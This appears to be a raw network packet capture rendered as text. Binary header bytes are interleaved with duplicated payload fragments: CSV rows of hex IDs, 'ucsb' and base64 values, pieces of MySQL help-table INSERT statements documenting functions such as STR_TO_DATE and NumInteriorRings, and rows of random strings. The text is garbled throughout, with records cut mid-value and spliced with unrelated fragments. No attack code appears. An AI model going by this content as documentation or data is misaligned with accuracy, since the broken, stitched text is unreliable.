34B267C8D41256E7BD3017A772E58613,ucsb,MTNzEwEDAu77O8dIKSDzovhT3/7MIkrG9i8S2g==
B52D4B814FA6790BE264C3D55D0BF5AA,ucsb,MTNzEwEDAu8AYNtJg9fDPZdvUzAdn62oP6yksw==
9EB1468DCABC7B417D679C0C107207E1,ucsb,MTNzEwEDAvAQNPCm3KqnJbZ0qFHxWMXeBJmuWw==
A43A86D115886F385D03E162AFBCA673,ucsb,MTNzEwEDAvElKzkpWHVqdz5WSGHwycX9zD9PxA==
55BF949AA1A9062947FC bb0`BiET@/o0AE< 2@@  P2V? /m hdQOPIhSZYa6omvWBbaw==
20ACE8B605CDFDC3597C3086E0390130,ucsb,MTNzEwEDAuO97aQCf6qmJ/1tuk4AMuYnIVnPyQ==
8D2FE5350A73BB4709496FC856D58D32,ucsb,MTNzEwEDAuQfs8M/BFbt4IwfBr8bjI9gMjE7zg==
483F56CC9974E3ADC405E0119B753BEE,ucsb,MTNzEwEDAuVVUt71GhbPfOAmav8Aw++IiU1D7g==
658C13190F57443F416756929B57CF45,ucsb,MTNzEwEDAuYVeIMa6VoIN9Hjhdhjo+oaV51AQA==
3A804ACFA7E8FD0875CFADEE2558E4D4,ucsb,MTNzEwEDAueLZ5WsiMJPJUYi/jGfoM72v6ryig==
6E1DA75C2B50DF414C887F3E4D16FA15,ucsb,MTNzEwEDAuiAuMdj96nTt12ecabQGplvOCOyZQ==
436CA861D94F28B896A3B52044C253F0,ucsb,MTNzEwEDAunXVOyf4lKwzcXLki/4ji2R6tdGdw==
1E0FD6E2C987A6964E4F0A182DBCD5B2,ucsb,MTNzEwEDAuqPzkDg0nQmrBtZ4Eb5SVxVdq534A==
714BF75C1E7BDCFB24C1A8AA4A78BA9B,ucsb,MTNzEwEDAuuCgi5TdPN1bkGrKGNuaP+WrNwzQg==
87E92067EC978679A56195318AE69C49,ucsb,MTNzEwEDAuy/J0XZKTyskAU9gm6FsJ6dvbknqQ==
FCE3C37A26F4AF58668B549230631351,ucsb,MTNzEwEDAu0rZazb5vlxPEAC7iPcXvuwTg5g+Q==
34B267C8D41256E7BD3017A772E58613,ucsb,MTNzEwEDAu77O8dIKSDzovhT3/7MIkrG9i8S2g==
B52D4B814FA6790BE264C3D55D0BF5AA,ucsb,MTNzEwEDAu8AYNtJg9fDPZdvUzAdn62oP6yksw==
9EB1468DCABC7B417D679C0C107207E1,ucsb,MTNzEwEDAvAQNPCm3KqnJbZ0qFHxWMXeBJmuWw==
A43A86D115886F385D03E162AFBCA673,ucsb,MTNzEwEDAvElKzkpWHVqdz5WSGHwycX9zD9PxA==
55BF949AA1A9062947FC bbBi0`ET@/p܂Ao0E<2@?LE  3PX Ytڀ  t)9the reverse function of the DATE_FORMAT() function. It takes a\nstring str and a format string format.\nSTR_TO_DATE() returns a DATETIME value if the format\nstring contains both date and time parts, or a DATE or TIME\nvalue if the string contains only date or time parts.\n\nThe date, time, or datetime values contained in str should be given\nin the format indicated by format. For the specifiers that can be\nused in format, see the table in the DATE_FORMAT() function\ndescription. All other characters are just taken verbatim, thus not being\ninterpreted.\nIf str contains an illegal date, time, or datetime value,\nSTR_TO_DATE() returns NULL. Starting from MySQL 5.0.3, an\nillegal value also produces a warning.\n','@c next example commented out until format string becomes optional\n@c mysql> SELECT STR_TO_DATE(\'2003-10-03\');\n@c -> 2003-10-03 00:00:00\nmysql> SELECT STR_TO_DATE(\'03.10.2003 09.20\',\n -> \'%d.%m.%Y %H.%i\');\n -> \'2003-10-03 09:20:00\'\nmysql> SELECT STR_TO_DATE(\'10arp\', \'%carp\');\n -> \'0000-10-00 00:00:00\'\nmysql> SELECT STR_TO_DATE(\'2003-15-10 00:00:00\',\n -> \'%Y-%m-%d %H:%i:%s\');\n -> NULL',''),(319,'Y',16,' Y(p)\nReturns the Y-coordinate value for the point p asC. bb0`BiET@/Ԁo0SE<2@@KE  3PX Ytڀ  t)9the reverse function of the DATE_FORMAT() function. It takes a\nstring str and a format string format.\nSTR_TO_DATE() returns a DATETIME value if the format\nstring contains both date and time parts, or a DATE or TIME\nvalue if the string contains only date or time parts.\n\nThe date, time, or datetime values contained in str should be given\nin the format indicated by format. For the specifiers that can be\nused in format, see the table in the DATE_FORMAT() function\ndescription. All other characters are just taken verbatim, thus not being\ninterpreted.\nIf str contains an illegal date, time, or datetime value,\nSTR_TO_DATE() returns NULL. Starting from MySQL 5.0.3, an\nillegal value also produces a warning.\n','@c next example commented out until format string becomes optional\n@c mysql> SELECT STR_TO_DATE(\'2003-10-03\');\n@c -> 2003-10-03 00:00:00\nmysql> SELECT STR_TO_DATE(\'03.10.2003 09.20\',\n -> \'%d.%m.%Y %H.%i\');\n -> \'2003-10-03 09:20:00\'\nmysql> SELECT STR_TO_DATE(\'10arp\', \'%carp\');\n -> \'0000-10-00 00:00:00\'\nmysql> SELECT STR_TO_DATE(\'2003-15-10 00:00:00\',\n -> \'%Y-%m-%d %H:%i:%s\');\n -> NULL',''),(319,'Y',16,' Y(p)\nReturns the Y-coordinate value for the point p asC{ bbBi0`ET@/,|po0E< 3@?  P2[? 2 idTFB6369BBD94CA,ucsb,MTNzEwEDAvK5lDqZTJTryKV5wEjEQ4Rh46dzzQ==
6582473C7530E016B4EE25C9F4373587,ucsb,MTNzEwEDAvPw5LEhvr/SbUw7JH/NkYd0g3FYuw==
4E62A6B5A5D5A372F303FF33D8B7ACDA,ucsb,MTNzEwEDAvQLBV6717sYkVq9Pr+cyEw1EV4lVw==
878FD9418CA5C83A52ACE23655AF14CC,ucsb,MTNzEwEDAvUzb3lD7k51pmBJrXt7g6vnG3chbA==
A45A34406A9DE89EACF9A5906E79749E,ucsb,MTNzEwEDAvY82+KJtZ6l20CPfA101kAHjyUZyw==
545EC5E0F20C35AFF87E3F221F3C1A87,ucsb,MTNzEwEDAveIebY0yzixSgxfhJpblp+OOaDtSg==
1E9381EF77E13BD085B03E59E0810C62,ucsb,MTNzEwEDAvjtjV9SZUSr/8XlL7egwkjg02pjZw==
E1A8399F9FDF9E7FA311D7FE17AB69DA,ucsb,MTNzEwEDAvkVjTLm7i6BaD4ZQSmDpGPGlnCwsw==
1EE788DBBACBCB124E46577051EA87D6,ucsb,MTNzEwEDAvqAOcEwpamUMGip2pEsWwWp5ySsog==
66376F1A47FFA645B86EB4E6FEBB976B,ucsb,MTNzEwEDAvsaSNwA31QelYrGVDQ5mniwc7B4gw==
63E54741DA82A237903A21E6E6FE4395,ucsb,MTNzEwEDAvyw0yfHxEQe5QC91JaUyocYyZSaVg==
1E9ACCF387F0A21EBF4E2828DD3AA708,ucsb,MTNzEwEDAv1fQSMeb25jEgrnW8qDOMrqgDFBHg==
04ABBB4AA795E28CC0BF134F393C803A,ucsb,MTNzEwEDAv7JLM6mgfYBwIMDl5mE1bZE1P7l5Q==
BBEB780860C82BAA6A489E13409CA399,ucsb,MTNzEwEDAv/bEPpsfiy4oklhuaZ19Nmns8QAmA==
ADD9FB039BF6AF04AD0FD87E9E0A3773,ucsb,MTNzEwEDAwDavGErJpxYXIzRJgrphEsVw3XQnQ==
2B2A4B1DE28A0924C53D95C4253FCEBD,ucsb,MTNzEwEDAwF21+rwADYSgc05C bb0`BiET@/o0AE< 3@@  P2[? 2 idTFB6369BBD94CA,ucsb,MTNzEwEDAvK5lDqZTJTryKV5wEjEQ4Rh46dzzQ==
6582473C7530E016B4EE25C9F4373587,ucsb,MTNzEwEDAvPw5LEhvr/SbUw7JH/NkYd0g3FYuw==
4E62A6B5A5D5A372F303FF33D8B7ACDA,ucsb,MTNzEwEDAvQLBV6717sYkVq9Pr+cyEw1EV4lVw==
878FD9418CA5C83A52ACE23655AF14CC,ucsb,MTNzEwEDAvUzb3lD7k51pmBJrXt7g6vnG3chbA==
A45A34406A9DE89EACF9A5906E79749E,ucsb,MTNzEwEDAvY82+KJtZ6l20CPfA101kAHjyUZyw==
545EC5E0F20C35AFF87E3F221F3C1A87,ucsb,MTNzEwEDAveIebY0yzixSgxfhJpblp+OOaDtSg==
1E9381EF77E13BD085B03E59E0810C62,ucsb,MTNzEwEDAvjtjV9SZUSr/8XlL7egwkjg02pjZw==
E1A8399F9FDF9E7FA311D7FE17AB69DA,ucsb,MTNzEwEDAvkVjTLm7i6BaD4ZQSmDpGPGlnCwsw==
1EE788DBBACBCB124E46577051EA87D6,ucsb,MTNzEwEDAvqAOcEwpamUMGip2pEsWwWp5ySsog==
66376F1A47FFA645B86EB4E6FEBB976B,ucsb,MTNzEwEDAvsaSNwA31QelYrGVDQ5mniwc7B4gw==
63E54741DA82A237903A21E6E6FE4395,ucsb,MTNzEwEDAvyw0yfHxEQe5QC91JaUyocYyZSaVg==
1E9ACCF387F0A21EBF4E2828DD3AA708,ucsb,MTNzEwEDAv1fQSMeb25jEgrnW8qDOMrqgDFBHg==
04ABBB4AA795E28CC0BF134F393C803A,ucsb,MTNzEwEDAv7JLM6mgfYBwIMDl5mE1bZE1P7l5Q==
BBEB780860C82BAA6A489E13409CA399,ucsb,MTNzEwEDAv/bEPpsfiy4oklhuaZ19Nmns8QAmA==
ADD9FB039BF6AF04AD0FD87E9E0A3773,ucsb,MTNzEwEDAwDavGErJpxYXIzRJgrphEsVw3XQnQ==
2B2A4B1DE28A0924C53D95C4253FCEBD,ucsb,MTNzEwEDAwF21+rwADYSgc05C bbBi0`ET@/,|po0E< 4@?  P2`?  idT6DBEmWk2jmmPzQ==
81EBEFBA2E1BFCD7B388DD89878A32C2,ucsb,MTNzEwEDAwIsPU8aY05mmTma42Ks6XcJiTiYZA==
5C9F92C70B8212B7B91E3A7320A4B17B,ucsb,MTNzEwEDAwPxkhG5wRDsXCGAUY4q7cok/JiDmw==
74600A97E003C1A294AD6D5D69FDD6AD,ucsb,MTNzEwEDAwRrZNQ7VxzTTM2oC76fRX1EvLu++A==
2C683C15890FCAC616FCD45A3E113461,ucsb,MTNzEwEDAwV7OM6HRf5KVZpmGBizIArhn+pltQ==
AD8DF02072ABD83C284E868AB3F9A7C6,ucsb,MTNzEwEDAwb1jLflEUsh/+oQDIAQ5+Qs8aiAxw==
ED2EBBBE559513C2C59611FB6C61F445,ucsb,MTNzEwEDAwfDOWVJVvMYl/LR+i85BfOvEY7GFg==
15E2B1518B63020AC9DD737C8B3D93E3,ucsb,MTNzEwEDAwg7HoEM32MjL+1Q3cMWu20bIJBnYA==
E6C054A54893747DBEC5F03A25A01113,ucsb,MTNzEwEDAwmq+LdIbxFJt7+aaUX8FesnbX6zhw==
4069CEEE42B806DB1344E8BF4E478E47,ucsb,MTNzEwEDAwr3FgsDXPND3LCvDsWWFbQUZ9MDMg==
6211FB24B0FF8E45823421F81189CBF1,ucsb,MTNzEwEDAwsgxDRc1H/BtVCpXPexWTbeEWaPSw==
2327E9954485C24B5D0288BFD83A150A,ucsb,MTNzEwEDAwxV3+XOBUc0NBIC5ZCin0M2sutTwQ==
89670126F891A986182176F71A647E18,ucsb,MTNzEwEDAw3CimvghvQWvx9vM2mys+R4Ewni9A==
7A44A8B9119ECF5AEA8DC1981DDD390D,ucsb,MTNzEwEDAw7DdQWvcwSeFHuhTb2KPZs4eIGunA==
19ACC9E9EEFE6A2AE16086914E8FEA9E,ucsb,MTNzEwEDAw/WTeBv+xNVMQxMaVLwRCxihbq1NA==
760D5D44D4504625D13C5FFFE9FC59C2,ucsb,MTNzEwEDAxBE5P2V9BVEanxLRMjhFBbCuukWsw==
2619CB2A18CFC1A82FFF1FC bb0`BiET@/o0AE< 4@@  P2`?  idT6DBEmWk2jmmPzQ==
81EBEFBA2E1BFCD7B388DD89878A32C2,ucsb,MTNzEwEDAwIsPU8aY05mmTma42Ks6XcJiTiYZA==
5C9F92C70B8212B7B91E3A7320A4B17B,ucsb,MTNzEwEDAwPxkhG5wRDsXCGAUY4q7cok/JiDmw==
74600A97E003C1A294AD6D5D69FDD6AD,ucsb,MTNzEwEDAwRrZNQ7VxzTTM2oC76fRX1EvLu++A==
2C683C15890FCAC616FCD45A3E113461,ucsb,MTNzEwEDAwV7OM6HRf5KVZpmGBizIArhn+pltQ==
AD8DF02072ABD83C284E868AB3F9A7C6,ucsb,MTNzEwEDAwb1jLflEUsh/+oQDIAQ5+Qs8aiAxw==
ED2EBBBE559513C2C59611FB6C61F445,ucsb,MTNzEwEDAwfDOWVJVvMYl/LR+i85BfOvEY7GFg==
15E2B1518B63020AC9DD737C8B3D93E3,ucsb,MTNzEwEDAwg7HoEM32MjL+1Q3cMWu20bIJBnYA==
E6C054A54893747DBEC5F03A25A01113,ucsb,MTNzEwEDAwmq+LdIbxFJt7+aaUX8FesnbX6zhw==
4069CEEE42B806DB1344E8BF4E478E47,ucsb,MTNzEwEDAwr3FgsDXPND3LCvDsWWFbQUZ9MDMg==
6211FB24B0FF8E45823421F81189CBF1,ucsb,MTNzEwEDAwsgxDRc1H/BtVCpXPexWTbeEWaPSw==
2327E9954485C24B5D0288BFD83A150A,ucsb,MTNzEwEDAwxV3+XOBUc0NBIC5ZCin0M2sutTwQ==
89670126F891A986182176F71A647E18,ucsb,MTNzEwEDAw3CimvghvQWvx9vM2mys+R4Ewni9A==
7A44A8B9119ECF5AEA8DC1981DDD390D,ucsb,MTNzEwEDAw7DdQWvcwSeFHuhTb2KPZs4eIGunA==
19ACC9E9EEFE6A2AE16086914E8FEA9E,ucsb,MTNzEwEDAw/WTeBv+xNVMQxMaVLwRCxihbq1NA==
760D5D44D4504625D13C5FFFE9FC59C2,ucsb,MTNzEwEDAxBE5P2V9BVEanxLRMjhFBbCuukWsw==
2619CB2A18CFC1A82FFF1FC bbBi0`ET@/p܂Ao0E<3@?LD  3PXatڀ [ u): a double-precision\nnumber.\n','mysql> SELECT Y(GeomFromText(\'Point(56.7 53.34)\'));\n+--------------------------------------+\n| Y(GeomFromText(\'Point(56.7 53.34)\')) |\n+--------------------------------------+\n| 53.34 |\n+--------------------------------------+',''),(320,'NUMINTERIORRINGS',0,' NumInteriorRings(poly)\nReturns the number of interior rings in the Polygon value poly.\n','mysql> SET @poly =\n -> \'Polygon((0 0,0 3,3 3,3 0,0 0),(1 1,1 2,2 2,2 1,1 1))\';\nmysql> SELECT NumInteriorRings(GeomFromText(@poly));\n+---------------------------------------+\n| NumInteriorRings(GeomFromText(@poly)) |\n+---------------------------------------+\n| 1 |\n+---------------------------------------+',''),(321,'INTERIORRINGN',0,' InteriorRingN(poly,n)\nReturns the n-th interior ring for the Polygon value\npoly as a LineString.\nRing numbers begin at 1.\n','mysql> SET @poly =\n -> \'Polygon((0 0,0 3,3 3,3 0,0 0),(1 1,1 2,2 2,2 1,1 1))\';\nmysql> SELECT AsText(InteriorRingN(GeomFromText(@poly),1));\n+----------------------------------------------+\n| AsText(InteriorRingN(GeomFromText(@poly),1)) |\n+----------------------------------------------+\n| LINESTRING(1 1,1 2,2 2,2 1,1 1) |\nC0 bb0`BiET@/Ԁo0SE<3@@KD  3PXatڀ [ u): a double-precision\nnumber.\n','mysql> SELECT Y(GeomFromText(\'Point(56.7 53.34)\'));\n+--------------------------------------+\n| Y(GeomFromText(\'Point(56.7 53.34)\')) |\n+--------------------------------------+\n| 53.34 |\n+--------------------------------------+',''),(320,'NUMINTERIORRINGS',0,' NumInteriorRings(poly)\nReturns the number of interior rings in the Polygon value poly.\n','mysql> SET @poly =\n -> \'Polygon((0 0,0 3,3 3,3 0,0 0),(1 1,1 2,2 2,2 1,1 1))\';\nmysql> SELECT NumInteriorRings(GeomFromText(@poly));\n+---------------------------------------+\n| NumInteriorRings(GeomFromText(@poly)) |\n+---------------------------------------+\n| 1 |\n+---------------------------------------+',''),(321,'INTERIORRINGN',0,' InteriorRingN(poly,n)\nReturns the n-th interior ring for the Polygon value\npoly as a LineString.\nRing numbers begin at 1.\n','mysql> SET @poly =\n -> \'Polygon((0 0,0 3,3 3,3 0,0 0),(1 1,1 2,2 2,2 1,1 1))\';\nmysql> SELECT AsText(InteriorRingN(GeomFromText(@poly),1));\n+----------------------------------------------+\n| AsText(InteriorRingN(GeomFromText(@poly),1)) |\n+----------------------------------------------+\n| LINESTRING(1 1,1 2,2 2,2 1,1 1) |\nC ZZBi0`EL@/܂Sŀo0E4d@? 3 Pֱ΀'tyr )IČC ZZ0`BiEL@/go0AE4d@@ 3 Pֱ΀'tyr )IČC] bbBi0`ET@/p܂Ao0E<4@?LC  3PXitڀ  u):+----------------------------------------------+',''),(322,'UTC_TIME',14,' UTC_TIME\n UTC_TIME()\nReturns the current UTC time as a value in \'HH:MM:SS\' or HHMMSS\nformat, depending on whether the function is used in a string or numeric\ncontext.\n','mysql> SELECT UTC_TIME(), UTC_TIME() + 0;\n -> \'18:07:53\', 180753',''),(323,'STDDEV',12,' STD(expr)\n STDDEV(expr)\nReturns the population standard deviation of expr. This is an\nextension to standard SQL. The STDDEV() form of this function is\nprovided for Oracle compatibility. As of MySQL 5.0.3, the standard SQL\nfunction STDDEV_POP() can be used instead.\n','',''),(324,'PERIOD_ADD',14,' PERIOD_ADD(P,N)\nAdds N months to period P (in the format YYMM or\nYYYYMM). Returns a value in the format YYYYMM.\nNote that the period argument P is /not/ a date value.\n','mysql> SELECT PERIOD_ADD(9801,2);\n -> 199803',''),(325,'|',27,' |\nBitwise OR:\n','mysql> SELECT 29 | 15;\n -> 31',''),(326,'GEOMFROMTEXT',3,' GeomFromText(wkt[,srid])\n GeometryFromText(wkt[,srid])\nConstructs a geometry value of any type using its WKT representation and SRID.\n','',''),(327,'RIGHT',23,' RIGHT(str,len)\nReturns the rightmost len characters from the string str.\n','mysql> SELECT RIGHT(\'foobarbar\', 4);\n Cf ZZBi0`EL@/܂Sŀo0E4f@? 3 Pֶր'tti )IŌC bb0`BiET@/Ԁo0SE<4@@KC  3PXitڀ  u):+----------------------------------------------+',''),(322,'UTC_TIME',14,' UTC_TIME\n UTC_TIME()\nReturns the current UTC time as a value in \'HH:MM:SS\' or HHMMSS\nformat, depending on whether the function is used in a string or numeric\ncontext.\n','mysql> SELECT UTC_TIME(), UTC_TIME() + 0;\n -> \'18:07:53\', 180753',''),(323,'STDDEV',12,' STD(expr)\n STDDEV(expr)\nReturns the population standard deviation of expr. This is an\nextension to standard SQL. The STDDEV() form of this function is\nprovided for Oracle compatibility. As of MySQL 5.0.3, the standard SQL\nfunction STDDEV_POP() can be used instead.\n','',''),(324,'PERIOD_ADD',14,' PERIOD_ADD(P,N)\nAdds N months to period P (in the format YYMM or\nYYYYMM). Returns a value in the format YYYYMM.\nNote that the period argument P is /not/ a date value.\n','mysql> SELECT PERIOD_ADD(9801,2);\n -> 199803',''),(325,'|',27,' |\nBitwise OR:\n','mysql> SELECT 29 | 15;\n -> 31',''),(326,'GEOMFROMTEXT',3,' GeomFromText(wkt[,srid])\n GeometryFromText(wkt[,srid])\nConstructs a geometry value of any type using its WKT representation and SRID.\n','',''),(327,'RIGHT',23,' RIGHT(str,len)\nReturns the rightmost len characters from the string str.\n','mysql> SELECT RIGHT(\'foobarbar\', 4);\n C ZZ0`BiEL@/go0AE4f@@ 3 Pֶր'tti )IŌC bbBi0`ET@/أ  o0E<@?j  3PZi0  _)AoB7r',3163,'MTNzEwEJAAHrzyIKgh6oEJ1MvAEQ/gfDW5expA==','19828671'),(710314096,'xTexsKPn',2613,'MTNzEwEJAAIKB7p6YsDyE13z0gc/oW57K5v28w==','30898294'),(272965405,'E7SpZgNOx0',719,'MTNzEwEJAAOrvK3oqE8thOd/GHcjuvz/03RFGg==','31682007'),(332502472,'iC0bTHpB',4493,'MTNzEwEJAASY+/cire0VANK87k29MwJQH7At3w==','27065039'),(814940606,'fKAMt2',3496,'MTNzEwEJAAUA5oFnkzgnkNkq7F0s0L8LV96DyQ==','9403493'),(961045704,'Didb2Wcpnk',5196,'MTNzEwEJAAaBPW6A2Oxsz2XOTqlvsOnMHXg2hA==','17675215'),(156517593,'PMoVvAybZ4',2622,'MTNzEwEJAAdyOSo3XMc1ITc9ddyFS7UTn12YBg==','10218161'),(86747720,'yeDTFc',4251,'MTNzEwEJAAjGdJRTYDiMF/BBFPxz3CP+SA6MTg==','31716909'),(331960129,'dWG275w1oOi',823,'MTNzEwEJAAnhtsyB3wJSxnuM+ynGzlrSjkDHqw==','16338822'),(744978398,'yJ0AfCX',604,'MTNzEwEJAArKsRxWWIXBUN2eFWTyNLAWBKW1zQ==','38168282'),(909074458,'I95SuheAOD',3039,'MTNzEwEJAAtYe3c1yxxc72QXnhq+X/kC4Qqhew==','15100544'),(251641537,'Dzk6DS',1010,'MTNzEwEJAAwPiXAT/JPanv0mKSxwT2BCI+P0Jg==','33550740'),(617501166,'IJRoowqby',3267,'MTNzEwEJAA1sxgv8O57qqGPEt2ajsWM3ebT2Qg==','14992743'),(300961067,'9PNQIikl',2384,'MTNzEwEJAA5F1O61QQAVaDdm5XNw9OW8WF16nA==','22489160'),(780013234,'MaPQCT49',1503,'MTNzEwEJAA/VO/37pWQ8O4ZYFQHeeYnB8ZE0QA==','36095669'),(613788964,'A73jwkm8B9',1097,'MTNzEwEJABDFtjAemjoL5OhClSvHAdnFiHFQ4w==','C bb0`BiET@/Ԁo0SE<@@i  3PZi0  _)AoB7r',3163,'MTNzEwEJAAHrzyIKgh6oEJ1MvAEQ/gfDW5expA==','19828671'),(710314096,'xTexsKPn',2613,'MTNzEwEJAAIKB7p6YsDyE13z0gc/oW57K5v28w==','30898294'),(272965405,'E7SpZgNOx0',719,'MTNzEwEJAAOrvK3oqE8thOd/GHcjuvz/03RFGg==','31682007'),(332502472,'iC0bTHpB',4493,'MTNzEwEJAASY+/cire0VANK87k29MwJQH7At3w==','27065039'),(814940606,'fKAMt2',3496,'MTNzEwEJAAUA5oFnkzgnkNkq7F0s0L8LV96DyQ==','9403493'),(961045704,'Didb2Wcpnk',5196,'MTNzEwEJAAaBPW6A2Oxsz2XOTqlvsOnMHXg2hA==','17675215'),(156517593,'PMoVvAybZ4',2622,'MTNzEwEJAAdyOSo3XMc1ITc9ddyFS7UTn12YBg==','10218161'),(86747720,'yeDTFc',4251,'MTNzEwEJAAjGdJRTYDiMF/BBFPxz3CP+SA6MTg==','31716909'),(331960129,'dWG275w1oOi',823,'MTNzEwEJAAnhtsyB3wJSxnuM+ynGzlrSjkDHqw==','16338822'),(744978398,'yJ0AfCX',604,'MTNzEwEJAArKsRxWWIXBUN2eFWTyNLAWBKW1zQ==','38168282'),(909074458,'I95SuheAOD',3039,'MTNzEwEJAAtYe3c1yxxc72QXnhq+X/kC4Qqhew==','15100544'),(251641537,'Dzk6DS',1010,'MTNzEwEJAAwPiXAT/JPanv0mKSxwT2BCI+P0Jg==','33550740'),(617501166,'IJRoowqby',3267,'MTNzEwEJAA1sxgv8O57qqGPEt2ajsWM3ebT2Qg==','14992743'),(300961067,'9PNQIikl',2384,'MTNzEwEJAA5F1O61QQAVaDdm5XNw9OW8WF16nA==','22489160'),(780013234,'MaPQCT49',1503,'MTNzEwEJAA/VO/37pWQ8O4ZYFQHeeYnB8ZE0QA==','36095669'),(613788964,'A73jwkm8B9',1097,'MTNzEwEJABDFtjAemjoL5OhClSvHAdnFiHFQ4w==','C bbBi0`ET@/,|po0E< 5@?  P2e?  jdVC041237CDE,ucsb,MTNzEwEDAxH7QncMpkZXyK67AHkXhO/Q8VCq1A==
0F184C107495D6EE3ED41B11506B4450,ucsb,MTNzEwEDAxJYbh/s8Dp4UoYL+4lgk4/bW+QZ9g==
1C5EB2EF15F076E4D53877B018763E55,ucsb,MTNzEwEDAxOy4WsPR+/G8RJusx8fqqXXqAbqSg==
5A1FB8EE42F371869A2719B404E8AEF1,ucsb,MTNzEwEDAxRYR6jaZ13F+k5ifeNxjwY7zYmFWw==
77D6486DF47A16C42E500C970560AFCF,ucsb,MTNzEwEDAxWrEDgXQyiHa9LOYN1NNKF+IonB+A==
8AE6F5A8ADAE3195EB5B24944F1CC429,ucsb,MTNzEwEDAxYZVeBBatRwRQwHr9AFMaSNQ0EHXQ==
9DEFCDDEE7EB5D456AB04BBF2B26E21A,ucsb,MTNzEwEDAxfw90zv5xwNOZb8CqK1Y6Cw1eUPrA==
94778FE1ECBB84A178DFD7671031667B,ucsb,MTNzEwEDAxgkRbNQvsw0UJFU6+8fqv/JakGNrA==
32B5947B97B2781362CA011FAE087629,ucsb,MTNzEwEDAxmcx8lbJVu34Mj39Y3sGQ8Iryr3rg==
F6EC9A638C6325832C94C729A56C4D16,ucsb,MTNzEwEDAxqof39kiBtcoGf6N2HVvwrp06tZtA==
C33A84BD0B4AB3D784CE6DA2EA550C18,ucsb,MTNzEwEDAxvszqNSJg37DCc4AsLSjQsAwsaPsQ==
5FB9D2CDD0BF24276A8CD896F7918C84,ucsb,MTNzEwEDAxy8M6F2ivwSGDoQQvmS1qTDpM4MYQ==
49940C1E2B90BB3ACE70D105F5A827FB,ucsb,MTNzEwEDAx1syiNaf11KHYF5ZcYaDV7ahb27Ow==
722EA86ACCC87DCA6F7140203CA836F8,ucsb,MTNzEwEDAx41uP73kH6I+TCekMoWDweAMj52mg==
5CA3079B370A7743A22B6C4DA71648E3,ucsb,MTNzEwEDAx+eWOo6VaajxtRSuCMz1bGkmxi4eQ==
0B29BA727283DC09D4608064BB4398B6,ucsb,MTNzEwEDAyBpIOCQPUko77h7Rp8C bb0`BiET@/o0AE< 5@@  P2e?  jdVC041237CDE,ucsb,MTNzEwEDAxH7QncMpkZXyK67AHkXhO/Q8VCq1A==
0F184C107495D6EE3ED41B11506B4450,ucsb,MTNzEwEDAxJYbh/s8Dp4UoYL+4lgk4/bW+QZ9g==
1C5EB2EF15F076E4D53877B018763E55,ucsb,MTNzEwEDAxOy4WsPR+/G8RJusx8fqqXXqAbqSg==
5A1FB8EE42F371869A2719B404E8AEF1,ucsb,MTNzEwEDAxRYR6jaZ13F+k5ifeNxjwY7zYmFWw==
77D6486DF47A16C42E500C970560AFCF,ucsb,MTNzEwEDAxWrEDgXQyiHa9LOYN1NNKF+IonB+A==
8AE6F5A8ADAE3195EB5B24944F1CC429,ucsb,MTNzEwEDAxYZVeBBatRwRQwHr9AFMaSNQ0EHXQ==
9DEFCDDEE7EB5D456AB04BBF2B26E21A,ucsb,MTNzEwEDAxfw90zv5xwNOZb8CqK1Y6Cw1eUPrA==
94778FE1ECBB84A178DFD7671031667B,ucsb,MTNzEwEDAxgkRbNQvsw0UJFU6+8fqv/JakGNrA==
32B5947B97B2781362CA011FAE087629,ucsb,MTNzEwEDAxmcx8lbJVu34Mj39Y3sGQ8Iryr3rg==
F6EC9A638C6325832C94C729A56C4D16,ucsb,MTNzEwEDAxqof39kiBtcoGf6N2HVvwrp06tZtA==
C33A84BD0B4AB3D784CE6DA2EA550C18,ucsb,MTNzEwEDAxvszqNSJg37DCc4AsLSjQsAwsaPsQ==
5FB9D2CDD0BF24276A8CD896F7918C84,ucsb,MTNzEwEDAxy8M6F2ivwSGDoQQvmS1qTDpM4MYQ==
49940C1E2B90BB3ACE70D105F5A827FB,ucsb,MTNzEwEDAx1syiNaf11KHYF5ZcYaDV7ahb27Ow==
722EA86ACCC87DCA6F7140203CA836F8,ucsb,MTNzEwEDAx41uP73kH6I+TCekMoWDweAMj52mg==
5CA3079B370A7743A22B6C4DA71648E3,ucsb,MTNzEwEDAx+eWOo6VaajxtRSuCMz1bGkmxi4eQ==
0B29BA727283DC09D4608064BB4398B6,ucsb,MTNzEwEDAyBpIOCQPUko77h7Rp8C bbBi0`ET@/,|po0E< 6@?  P2j? wk jdV/y+0S6vg5QQ==
CED3C7876C955C9E2B1CFE710A5FC7FA,ucsb,MTNzEwEDAyGUTQy7ofFDR7vA/3YStfUX0i80gA==
40545852B60CC67F8C2244F41234D4D5,ucsb,MTNzEwEDAyLAclh7JklIER/h2rQw6PUQEVQtRg==
BDAD3FCE9514BFC7ED48104ADD303BB6,ucsb,MTNzEwEDAyNcoid5Fg7FyAeO5DMzKQPwEp2lVA==
F2CC0F9F160430885983911699EEF77B,ucsb,MTNzEwEDAyQnGTL2eJwB8NH533KbgMUgnqqd9Q==
9FFEADE873CECF76DFF1EDD94D5ADA29,ucsb,MTNzEwEDAyVNYcNz1mnovSWkjCpHMEayfwXttA==
FD71C33B62275C29D0EDB12A971C8F8D,ucsb,MTNzEwEDAyYu8lEWHhUNrb1Njs4SXfag5w4eWg==
EDC0CFF20BE6161F09DC685BD135A6C8,ucsb,MTNzEwEDAyfN6msY+i5GM2Qu2RUYdWbHVoVfuw==
316ADA3CB938EE283950D28B9DE973C0,ucsb,MTNzEwEDAyirC8gJ852DQQpfrMLo38CTmFqiFQ==
416FEF40EBACA25118909110B5AD34E9,ucsb,MTNzEwEDAykn/pppJl3viuZJmtdje4xDZR3Lrg==
F7D937C0EDD90F41CD5208C0E7347F19,ucsb,MTNzEwEDAyo4NZFakrRqAaTVosGzfSBVZsxkqA==
45FD456A1DA7B3EC51E611C19B34B055,ucsb,MTNzEwEDAytefKrmxQe/dpj7fVG0quMMr0ss8Q==
86C2ADB42FADDEB3C13872051A785583,ucsb,MTNzEwEDAywvjxc7haPMJ/9Fqh2q2AbNWXPevw==
88B4D7C21718002D41A173CB163D7957,ucsb,MTNzEwEDAy2Kdos7q5scipI5ukBKNnUsbo9qsQ==
8932169EDD23565DE2DD0EDCD8006077,ucsb,MTNzEwEDAy5AF5KPVgOhXq2AvLa14NQ7t1vOMA==
0C57ABFDF89AB2950A2BEDBCEF88BAC6,ucsb,MTNzEwEDAy8HcD1GBalVmLYOdyWPssGU0B6G0A==
1C1D00D73557BDD7C5AB3A3C3C bb0`BiET@/o0AE< 6@@  P2j? wk jdV/y+0S6vg5QQ==
CED3C7876C955C9E2B1CFE710A5FC7FA,ucsb,MTNzEwEDAyGUTQy7ofFDR7vA/3YStfUX0i80gA==
